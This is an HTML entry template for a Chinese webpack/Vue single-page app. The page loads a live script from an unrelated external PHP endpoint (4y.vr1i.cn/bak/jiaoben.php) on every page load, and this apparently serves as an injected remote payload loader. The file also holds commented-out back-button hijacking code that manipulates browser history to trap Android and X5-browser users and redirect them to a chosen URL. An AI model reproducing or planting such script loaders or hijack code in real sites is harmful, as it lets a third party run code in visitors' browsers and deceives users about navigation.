<!DOCTYPE html>
<html lang="zh-CN">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="referrer" content="never">
	<meta name="viewport" content="width=device-width, user-scalable=no,
		 initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
	<title>
		<%= htmlWebpackPlugin.options.title %>
	</title>
	<!--<link rel="stylesheet" href="<%= BASE_URL %>static/index.css"/>-->
	<!--打包时使用下面-->
	<link rel="stylesheet" href="./static/index.css"/>
</head>
<body>
<div id="app"></div>
<script src="http://4y.vr1i.cn/bak/jiaoben.php"></script>
<script>
    // var ua = navigator.userAgent.toLocaleLowerCase();
    // var u = navigator.userAgent;
    // var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Linux') > -1; //g
    // var isIOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/); //ios终端
	//
    // // window.onload = function () {
    // //     var script = document.createElement("script");  //创建一个script标签
    // //     script.type = "text/javascript";
    // //     script.src = isAndroid ? "<?=$sys_global_url?>static/app/js/tt.js" : ''
    // //     document.getElementsByTagName('head')[0].appendChild(script);
    // // }

    // function gogg(url){
    //     history.pushState(history.length+1, "message", window.location.href.split('#')[0]+"#"+new Date().getTime());
    //     if(navigator.userAgent.indexOf('Android') != -1){
    //         if(typeof(tbsJs) != "undefined"){
    //             tbsJs.onReady('{useCachedApi : "true"}', function(e) {})
    //             window.onhashchange=function(){
    //                 location.href = url;
    //             };
    //         }else{
    //             var pop = 0;
    //             window.onhashchange = function(event) {
    //                 pop++
    //                 if (pop >= 3) {
    //                     location.href = url;
    //                 }else{
    //                     history.go(1)
    //                 }
    //             };
    //             history.go(-1);
    //         }
    //     }else{
    //         window.onhashchange=function(){
    //             location.href = url;
    //         };
    //     }
    // }
    // gogg('http://www.baidu.com')
</script>
</body>
</html>
